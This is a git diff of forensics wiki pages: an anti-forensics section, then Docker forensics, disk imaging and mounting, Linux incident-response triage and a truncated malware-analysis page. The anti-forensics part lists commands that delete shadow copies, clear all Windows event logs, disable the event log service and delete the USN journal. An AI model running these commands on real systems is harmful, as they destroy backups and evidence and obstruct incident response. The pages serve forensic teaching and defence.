tools show the information from **`$STANDARD_INFORMATION`**. + +### TimeStomp - Anti-forensic Tool + +This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**. + +### Usnjrnl + +The **USN Journal** \(Update Sequence Number Journal\), or Change Journal, is a feature of the Windows NT file system \(NTFS\) which **maintains a record of changes made to the volume**. +It's possible to use the tool [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) to search for modifications of this record. + +![](../../.gitbook/assets/image%20%28453%29.png) + +The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file. + +### $LogFile + +All metadata changes to a file system are logged to ensure the consistent recovery of critical file system structures after a system crash. This is called [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). +The logged metadata is stored in a file called “**$LogFile**”, which is found in a root directory of an NTFS file system. +It's possible to use tools like [LogFileParser](https://github.com/jschicht/LogFileParser) to parse this file and find changes. + +![](../../.gitbook/assets/image%20%28450%29.png) + +Again, in the output of the tool it's possible to see that **some changes were performed**. + +Using the same tool it's possible to identify to **which time the timestamps were modified**: + +![](../../.gitbook/assets/image%20%28451%29.png) + +* CTIME: File's creation time +* ATIME: File's modification time +* MTIME: File's MFT registry modifiction +* RTIME: File's access time + +### `$STANDARD_INFORMATION` and `$FILE_NAME` comparison + +Another way to identify suspicions modified files would be to compare the time on both attributes looking for **mismatches**. + +### Nanoseconds + +**NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**. + +### SetMace - Anti-forensic Tool + +This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME` . However, from Windows Vista it's necessary a live OS to modify this information. + +## Data Hiding + +NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the files is deleted. Then, it's possible to **hide data in this slack space**. + +There are tools like slacker that allows to hide data in this "hidden" space. However, an analysis of the `$logfile` and `$usnjrnl` can show that some data was added: + +![](../../.gitbook/assets/image%20%28454%29.png) + +Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this can of tools can save the content obfuscated or even encrypted. + +## UsbKill + +This is a tool that will **turn off the computer is any change in the USB** ports is detected. +A way to discover this would be to inspect the running processes and **review each python script running**. + +## Live Linux Distributions + +These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion. + +## Secure Deletion + +[https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization) + +## Windows Configuration + +It's possible to disable several windows logging methods to make the forensics investigation much harder. + +### Disable Timestamps - UserAssist + +This is a registry key that maintains dates and hours when each executable was run by the user. + +Disabling UserAssist requires two steps: + +1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled. +2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`. + +### Disable Timestamps - Prefetch + +This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices. + +* Rexecute `regedit` +* Select the file path `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` +* Right-click on both `EnablePrefetcher` and `EnableSuperfetch` +* Select Modify on each of these to change the value from 1 \(or 3\) to 0 +* Restart + +### Disable Timestamps - Last Access Time + +Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance. + +1. Open the Registry Editor \(Regedit.exe\). +2. Browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`. +3. Look for `NtfsDisableLastAccessUpdate`. If it doesn’t exist, add this DWORD and set its value to 1, which will disable the process. +4. Close the Registry Editor, and reboot the server. + +### Delete USB History + +All the **USB Device Entries** are stored in Windows Registry Under **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device in your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history. +You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) to be sure you have deleted them \(and to delete them\). + +Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted. + +### Disable Shadow Copies + +**List** shadow copies with `vssadmin list shadowstorage` +**Delete** them running `vssadmin delete shadow` + +You can also delete them via GUI following the steps proposed in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) + +To disable shadow copies: + +1. Go to the Windows start button and type "services" into the text search box; open the Services program. +2. Locate "Volume Shadow Copy" from the list, highlight it, and then and the right-click > Properties. +3. From the "Startup type" drop-down menu, select Disabled, and then click Apply and OK. + +![](../../.gitbook/assets/image%20%28452%29.png) + +It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` + +### Overwrite deleted files + +* You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive. +* You can also use tools like [**Eraser**](https://eraser.heidi.ie/) + +### Delete Windows event logs + +* Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log" +* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"` +* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }` + +### Disable Windows event logs + +* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` +* Inside the services section disable the service "Windows Event Log" +* `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl` + +### Disable $UsnJrnl + +* `fsutil usn deletejournal /d c:` + diff --git a/forensics/basic-forensic-methodology/docker-forensics.md b/forensics/basic-forensic-methodology/docker-forensics.md new file mode 100644 index 00000000000..01c448ddb72 --- /dev/null +++ b/forensics/basic-forensic-methodology/docker-forensics.md @@ -0,0 +1,76 @@ +# Docker Forensics + +## Container modification + +There are suspicions that some docker container was compromised: + +```bash +docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress +``` + +You can easily **find the modifications done to this container respecting to the image** with: + +```bash +docker diff wordpress +C /var +C /var/lib +C /var/lib/mysql +A /var/lib/mysql/ib_logfile0 +A /var/lib/mysql/ib_logfile1 +A /var/lib/mysql/ibdata1 +A /var/lib/mysql/mysql +A /var/lib/mysql/mysql/time_zone_leap_second.MYI +A /var/lib/mysql/mysql/general_log.CSV +... +``` + +In the previous command **C** means **Changed** and **A,** **Added**. +If you find that some interesting file like `/etc/shadow` was modified you can download it from the container to check for malicious activity with: + +```bash +docker cp wordpress:/etc/shadow . +``` + +You can also **compare it with the original one** running a new container and extracting the file from it: + +```bash +docker run -d lamp-wordpress +docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container +diff original_shadow shadow +``` + +If you find that **some suspicious file was added** you can access the container and check it: + +```bash +docker exec -it wordpress bash +``` + +## Images modifications + +When you are given an exported docker image \(probably in `.tar` format\) you can use the following command to **extract the modifications**: + +```bash +docker save > image.tar #Export the image to a .tar file +container-diff analyze -t history image.tar +``` + +Then, you can **decompress** the image and **access the blobs** to search for suspicious files you may have found in the changes history: + +```bash +tar -xf image.tar +``` + +In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) utility: + +![](../../.gitbook/assets/image%20%28425%29.png) + +This allow you to **navigate through the different blobs of docker images** and check which files were modified/added. **Red** means added and **yellow** means modified. Use **tab** to move to the other view and **space** to to collapse/open folders. + +## Credentials from memory + +Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef` + +Therefore \(as root\) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-unix/privilege-escalation/#process-memory). + diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md new file mode 100644 index 00000000000..c46f21ee45b --- /dev/null +++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md @@ -0,0 +1,27 @@ +# Baseline Monitoring + +## Baseline + +A baseline consist on take a snapshot of certain part of a system in oder to c**ompare it with a future status to highlight changes**. + +For example, you can calculate and store the hash of each file of the filesystem to .be able to find out which files were modified. +This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all. + +### File Integrity Monitoring + +File integrity monitoring is one of the most powerful techniques used to secure IT infrastructures and business data against a wide variety of both known and unknown threats. +The goal is to generate a **baseline of all the files** that you want monitor and then **periodically** **check** those files for possible **changes** \(in the content, attribute, metadata...\). + +1. **Baseline comparison,** wherein one or more file attributes will be captured or calculated and stored as a baseline that can be compared against at some future time. This can be as simple as the time and date of the file, however, since this data can be easily spoofed, a more trustworthy approach is typically used. This may include periodically assessing the cryptographic checksum for a monitored file, \(e.g. using the MD5 or SHA-2 hashing algorithm\) and then comparing the result to the previously calculated checksum. + +2. **Real-time change notification**, which is typically implemented within or as an extension to the kernel of the operating system that will flag when a file is accessed or modified. + +### Tools + +* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) +* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) + +## References + +* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) + diff --git a/forensics/basic-forensic-methodology/image-adquisition-and-mount.md b/forensics/basic-forensic-methodology/image-adquisition-and-mount.md new file mode 100644 index 00000000000..8894d1fcc2e --- /dev/null +++ b/forensics/basic-forensic-methodology/image-adquisition-and-mount.md @@ -0,0 +1,112 @@ +# Image Adquisition & Mount + +## Acquisition + +### DD + +```bash +#This will generate a raw copy of the disk +dd if=/dev/sdb of=disk.img +``` + +### dcfldd + +```bash +#Raw copy with hashes along the way (more secur s it checks hashes while it's copying the data) +dcfldd if= of= bs=512 hash= hashwindow= hashlog= +dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes +``` + +### FTK Imager + +You can [**download the FTK imager from here**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1). + +```bash +ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name' +``` + +### EWF + +You can generate a dick image using the[ **ewf tools**](https://github.com/libyal/libewf). + +```bash +ewfacquire /dev/sdb +#Name: evidence +#Case number: 1 +#Description: A description for the case +#Evidence number: 1 +#Examiner Name: Your name +#Media type: fixed +#Media characteristics: physical +#File format: encase6 +#Compression method: deflate +#Compression level: fast + +#Then use default values +#It will generate the disk image in the current directory +``` + +## Mount + +### Several types + +In **Windows** you can try to use the free version of Arsenal Image Mounter \([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)\) to **mount the forensics image**. + +### Raw + +```bash +#Get file type +file evidence.img +evidence.img: Linux rev 1.0 ext4 filesystem data, UUID=1031571c-f398-4bfb-a414-b82b280cf299 (extents) (64bit) (large files) (huge files) + +#Mount it +mount evidence.img /mnt +``` + +### EWF + +```bash +#Get file type +file evidence.E01 +evidence.E01: EWF/Expert Witness/EnCase image file format + +#Transform to raw +mkdir output +ewfmount evidence.E01 output/ +file output/ewf1 +output/ewf1: Linux rev 1.0 ext4 filesystem data, UUID=05acca66-d042-4ab2-9e9c-be813be09b24 (needs journal recovery) (extents) (64bit) (large files) (huge files) + +#Mount +mount output/ewf1 -o ro,norecovery /mnt +``` + +### ArsenalImageMounter + +It's a Windows Application to mount volumes. You can download it here [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/) + +### Errors + +* **`cannot mount /dev/loop0 read-only`** in this case you need to use the flags **`-o ro,norecovery`** +* **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** in this case the mount failed due as the offset of the filesystem is different than that of the disk image. You need to find the Sector size and the Start sector: + +```bash +fdisk -l disk.img +Disk disk.img: 102 MiB, 106954648 bytes, 208896 sectors +Units: sectors of 1 * 512 = 512 bytes +Sector size (logical/physical): 512 bytes / 512 bytes +I/O size (minimum/optimal): 512 bytes / 512 bytes +Disklabel type: dos +Disk identifier: 0x00495395 + +Device Boot Start End Sectors Size Id Type +disk.img1 2048 208895 206848 101M 1 FAT12 +``` + +Note that sector size is **512** and start is **2048**. Then mount the image like this: + +```bash +mount disk.img /mnt -o ro,offset=$((2048*512)) +``` + + + diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md new file mode 100644 index 00000000000..9ce71562a27 --- /dev/null +++ b/forensics/basic-forensic-methodology/linux-forensics.md @@ -0,0 +1,389 @@ +# Linux Forensics + +## Initial Information Gathering + +### Basic Information + +First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** \(you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_\), then mount the USN, and modify the env variables to use those binaries: + +```bash +export PATH=/mnt/usb/bin:/mnt/usb/sbin +export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64 +``` + +Once you have configured the system to use good and known binaries you can start **extracting some basic information**: + +```bash +date #Date and time (Clock my be skewed, Might be in different timezone) +uname -a #OS info +ifconfig -a || ip a #Network interfaces (promiscuosu mode?) +ps -ef #Running processes +netstat -anp #Proccess and ports +lsof -V #Open files +netstat -rn; route #Routing table +df; mount #Free space and mounted devices +free #Meam and swap space +w #Who is connected +last -Faiwx #Logins +lsmod #What is loaded +cat /etc/passwd #Unexpected data? +cat /etc/shadow #Unexpected data? +find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory +``` + +#### Suspicious information + +While obtaining the basic information you should check for weird things like: + +* **root processes** usually run with low PIDS, so if you find a root process with a big PID you may suspect +* Check **registered logins** of users without a shell inside `/etc/passwd` +* Check for **password hashes** inside `/etc/shadow` for users without a shell + +### Memory Dump + +In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME). +In order to **compile** it you need to use the **exact same kernel** the victim machine is using. + +{% hint style="info" %} +Remember that you **cannot install LiME or any other thing** in the victim machine it will make several changes to it +{% endhint %} + +So, if you have an identical version of Ubuntu you can use `apt-get install lime-forensics-dkms` +In other cases you need to download [**LiME**](https://github.com/504ensicsLabs/LiME) from github can compile it with correct kernel headers. In order to **obtain the exact kernel headers** of the victim machine, you can just **copy the directory** `/lib/modules/` to your machine, and then **compile** LiME using them: + +```bash +make -C /lib/modules//build M=$PWD +sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime" +``` + +LiME supports 3 **formats**: + +* Raw \(every segment concatenated together\) +* Padded \(same as raw, but with zeroes in right bits\) +* Lime \(recommended format with metadata + +LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444` + +### Disk Imaging + +#### Shutting down + +First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown. +There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** \(as we have already took an image of the memory not much info is going to be lost\) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug. + +#### Taking an image of the disk + +It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information. + +```bash +#Create a raw copy of the disk +dd if= of= bs=512 + +#Raw copy with hashes along the way (more secur s it checks hashes while it's copying the data) +dcfldd if= of= bs=512 hash= hashwindow= hashlog= +dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes +``` + +### Disk Image pre-analysis + +Imaging that you receive a disk image with no more data. + +```bash +#Find that it's actually a disk imageusing "file" command +file disk.img +disk.img: Linux rev 1.0 ext4 filesystem data, UUID=59e7a736-9c90-4fab-ae35-1d6a28e5de27 (extents) (64bit) (large files) (huge files) + +#Check which type of disk image it's +img_stat -t evidence.img +raw +#You can list supported types with +img_stat -i list +Supported image format types: + raw (Single or split raw file (dd)) + aff (Advanced Forensic Format) + afd (AFF Multiple File) + afm (AFF with external metadata) + afflib (All AFFLIB image formats (including beta ones)) + ewf (Expert Witness Format (EnCase)) + +#Data of the image +fsstat -i raw -f ext4 disk.img +FILE SYSTEM INFORMATION +-------------------------------------------- +File System Type: Ext4 +Volume Name: +Volume ID: 162850f203fd75afab4f1e4736a7e776 + +Last Written at: 2020-02-06 06:22:48 (UTC) +Last Checked at: 2020-02-06 06:15:09 (UTC) + +Last Mounted at: 2020-02-06 06:15:18 (UTC) +Unmounted properly +Last mounted on: /mnt/disk0 + +Source OS: Linux +[...] + +#ls inside the image +fls -i raw -f ext4 disk.img +d/d 11: lost+found +d/d 12: Documents +d/d 8193: folder1 +d/d 8194: folder2 +V/V 65537: $OrphanFiles + +#ls inside folder +fls -i raw -f ext4 disk.img 12 +r/r 16: secret.txt + +#cat file inside image +icat -i raw -f ext4 disk.img 16 +ThisisTheMasterSecret +``` + +## Search for known Malware + +### Modified System Files + +Some Linux systems have a feature to **verify the integrity of many installed components**, providing an effective way to identify unusual or out of place files. For instance, `rpm -Va` on Linux is designed to verify all packages that were installed using RedHat Package Manager. + +```bash +#RedHat +rpm -Va +#Debian +dpkg --verify +debsums | grep -v "OK$" #apt-get install debsums +``` + +### Malware/Rootkit Detectors + +Read the following page to learn about tools that can be useful to find malware: + +{% page-ref page="malware-analysis.md" %} + +## Search installed programs + +### Package Manager + +On Debian-based systems, the _**/var/ lib/dpkg/status**_ file contains details about installed packages and the _**/var/log/dpkg.log**_ file records information when a package is installed. +On RedHat and related Linux distributions the **`rpm -qa --root=/ mntpath/var/lib/rpm`** command will list the contents of an RPM database on a subject systems. + +```bash +#Debian +cat /var/lib/dpkg/status | grep -E "Package:|Status:" +cat /var/log/dpkg.log | grep installed +#RedHat +rpm -qa --root=/ mntpath/var/lib/rpm +``` + +### Other + +**Not all installed programs will be listed by the above commands** because some applications are not available as packages for certain systems and must be installed from source. Therefore, a review of locations such as _**/usr/local**_ and _**/opt**_ may reveal other applications that have been compiled and installed from source code. + +```bash +ls /opt /usr/local +``` + +Another good idea is to **check** the **common folders** inside **$PATH** for **binaries not related** to **installed packages:** + +```bash +#Both lines are going to print the executables in /sbin non related to installed packages +#Debian +find /sbin/ -exec dpkg -S {} \; | grep "no path found" +#RedHat +find /sbin/ –exec rpm -qf {} \; | grep "is not" +``` + +## Inspect AutoStart locations + +### Scheduled Tasks + +```bash +cat /var/spool/cron/crontabs/* \ +/var/spool/cron/atjobs \ +/var/spool/anacron \ +/etc/cron* \ +/etc/at* \ +/etc/anacrontab \ +/etc/incron.d/* \ +/var/spool/incron/* \ + +#MacOS +ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ +``` + +### Services + +It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries. + +* _**/etc/inittab**_ +* _**/etc/rc.d/**_ +* _**/etc/rc.boot/**_ +* _**/etc/init.d/**_ +* _**/etc/inetd.conf**_ +* _**/etc/xinetd/**_ +* _**/etc/systemd/system**_ +* _**/etc/systemd/system/multi-user.target.wants/**_ + +### Kernel Modules + +On Linux systems, kernel modules are commonly used as rootkit components to malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware. + +### Other AutoStart Locations + +There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware. + +* _**/etc/profile.d/\***_ , _**/etc/profile**_ , _**/etc/bash.bashrc**_ are executed when any user account logs in. +* _**∼/.bashrc**_ , _**∼/.bash\_profile**_ , _**~/.profile**_ , _**∼/.config/autostart**_ are executed when the specific user logs in. +* _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel. + +## Examine Logs + +Look in all available log files on the compromised system for traces of malicious execution and associated activities such as creation of a new service. + +### Pure Logs + +**Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident. +Interesting system logons: + +* **/var/log/syslog** \(debian\) ****or **/var/log/messages** \(Redhat\) + * Shows general messages and info regarding the system. Basically a data log of all activity throughout the global system. +* **/var/log/auth.log** \(debian\) ****or **/var/log/secure** \(Redhat\) + * Keep authentication logs for both successful or failed logins, and authentication processes. Storage depends on system type. + * `cat /var/log/auth.log | grep -iE "session opened for|accepted password|new session|not in sudoers"` +* **/var/log/boot.log**: start-up messages and boot info. +* **/var/log/maillog** or **var/log/mail.log:** is for mail server logs, handy for postfix, smtpd, or email-related services info running on your server. +* **/var/log/kern.log**: keeps in Kernel logs and warning info. Kernel activity logs \(e.g., dmesg, kern.log, klog\) can show that a particular service crashed repeatedly, potentially indicating that an unstable trojanized version was installed. +* **/var/log/dmesg**: a repository for device driver messages. Use **dmesg** to see messages in this file. +* **/var/log/faillog:** records info on failed logins. Hence, handy for examining potential security breaches like login credential hacks and brute-force attacks. +* **/var/log/cron**: keeps a record of Crond-related messages \(cron jobs\). Like when the cron daemon started a job. +* **/var/log/daemon.log:** keeps track of running background services but doesn’t represent them graphically. +* **/var/log/btmp**: keeps a note of all failed login attempts. +* **/var/log/httpd/**: a directory containing error\_log and access\_log files of the Apache httpd daemon. Every error that httpd comes across is kept in the **error\_log** file. Think of memory problems and other system-related errors. **access\_log** logs all requests which come in via HTTP. +* **/var/log/mysqld.log** or **/var/log/mysql.log** : MySQL log file that records every debug, failure and success message, including starting, stopping and restarting of MySQL daemon mysqld. The system decides on the directory. RedHat, CentOS, Fedora, and other RedHat-based systems use /var/log/mariadb/mariadb.log. However, Debian/Ubuntu use /var/log/mysql/error.log directory. +* **/var/log/xferlog**: keeps FTP file transfer sessions. Includes info like file names and user-initiated FTP transfers. +* **/var/log/\*** : You should always check for unexpected logs in this directory + +{% hint style="info" %} +Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering. +{% endhint %} + +### Command History + +Many Linux systems are configured to maintain a command history for each user account: + +* ~/.bash\_history +* ~/.history +* ~/.sh\_history +* ~/.\*\_history + +### Logins + +Using the command `last -Faiwx` it's possible to get the list of users that have logged in. +It's recommended to check if those logins make sense: + +* Any unknown user? +* Any user that shouldn't have a shell has logged in? + +This is important as **attackers** some times may copy `/bin/bash` inside `/bin/false` so users like **lightdm** may be **able to login**. + +Note that you can also **take a look to this information reading the logs**. + +### Application Traces + +* **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account \(_**∼/.ssh/authorized\_keys**_ and _**∼/.ssh/known\_keys**_\). These entries can reveal the hostname or IP address of the remote hosts. +* **Gnome Desktop**: User accounts may have a _**∼/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop. +* **VIM**: User accounts may have a _**∼/.viminfo**_ file that contains details about the use of VIM, including search string history and paths to files that were opened using vim. +* **Open Office**: Recent files. +* **MySQL**: User accounts may have a _**∼/.mysql\_history**_ file that contains queries executed using MySQL. +* **Less**: User accounts may have a _**∼/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less + +### USB Logs + + [**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files \(`/var/log/syslog*` or `/var/log/messages*` depending on the distro\) for constructing USB event history tables. + +It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USB to find "violation events" \(the use of USBs that aren't inside that list\). + +### Installation + +```text +pip3 install usbrip +usbrip ids download #Downloal USB ID database +``` + +### Examples + +```text +usbrip events history #Get USB history of your curent linux machine +usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user +#Search for vid and/or pid +usbrip ids download #Downlaod database +usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid +``` + +More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) + +## Review User Accounts and Logon Activities + +Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks. +Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users. +Finally look for accounts with **no passwords** or **easily guessed** passwords. + +## Examine File System + +File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**. +**Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system. +To deal with such anti-forensic techniques, it is necessary to pay **careful attention to time line analysis** of file system date-time stamps and to files stored in common locations where malware might be found. + +* Using **autopsy** you can see the timeline of events that may be useful to discover suspicions activity. You can also use the `mactime` feature from **Sleuth Kit** directly. +* Check for **unexpected scripts** inside **$PATH** \(maybe some sh or php scripts?\) +* Files in `/dev` use to be special files, you may find non-special files here related to malware. +* Look for unusual or **hidden files** and **directories**, such as “.. ” \(dot dot space\) or “..^G ” \(dot dot control-G\) +* setuid copies of /bin/bash on the system `find / -user root -perm -04000 –print` +* Review date-time stamps of deleted **inodes for large numbers of files being deleted around the same time**, which might indicate malicious activity such as installation of a rootkit or trojanized service. +* Because inodes are allocated on a next available basis, **malicious files placed on the system at around the same time may be assigned consecutive inodes**. Therefore, after one component of malware is located, it can be productive to inspect neighbouring inodes. +* Also check directories like _/bin_ or _/sbin_ as the **modified and/or changed time** of new or modified files me be interesting. +* It's interesting to see the files and folders of a directory **sorted by creation date** instead alphabetically to see which files/folders are more recent \(last ones usually\). + +You can check the most recent files of a folder using `ls -laR --sort=time /bin` +You can check the inodes of the files inside a folder using `ls -lai /bin |sort -n` + +{% hint style="info" %} +Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**. +{% endhint %} + +## Compare files of different filesystem versions + +#### Find added files + +```bash +git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ +``` + +#### Find Modified content + +```bash +git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time" +``` + +#### Find deleted files + +```bash +git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ +``` + +#### Other filters + +**`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`** + +Select only files that are Added \(`A`\), Copied \(`C`\), Deleted \(`D`\), Modified \(`M`\), Renamed \(`R`\), have their type \(i.e. regular file, symlink, submodule, …​\) changed \(`T`\), are Unmerged \(`U`\), are Unknown \(`X`\), or have had their pairing Broken \(`B`\). Any combination of the filter characters \(including none\) can be used. When `*` \(All-or-none\) is added to the combination, all paths are selected if there is any file that matches other criteria in the comparison; if there is no file that matches other criteria, nothing is selected. + +Also, **these upper-case letters can be downcased to exclude**. E.g. `--diff-filter=ad` excludes added and deleted paths. + +Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries \(because the set of paths included in the diff is limited by what is in the index\). Similarly, copied and renamed entries cannot appear if detection for those types is disabled. + +## References + +* [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf) +* [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) + diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md new file mode 100644 index 00000000000..99e53f335f8 --- /dev/null +++ b/forensics/basic-forensic-methodology/malware-analysis.md @@ -0,0 +1,146 @@ +# Malware Analysis + +## Forensics CheatSheets + +[https://www.jaiminton.com/cheatsheet/DFIR/\#](https://www.jaiminton.com/cheatsheet/DFIR/#) + +## Online Services + +* 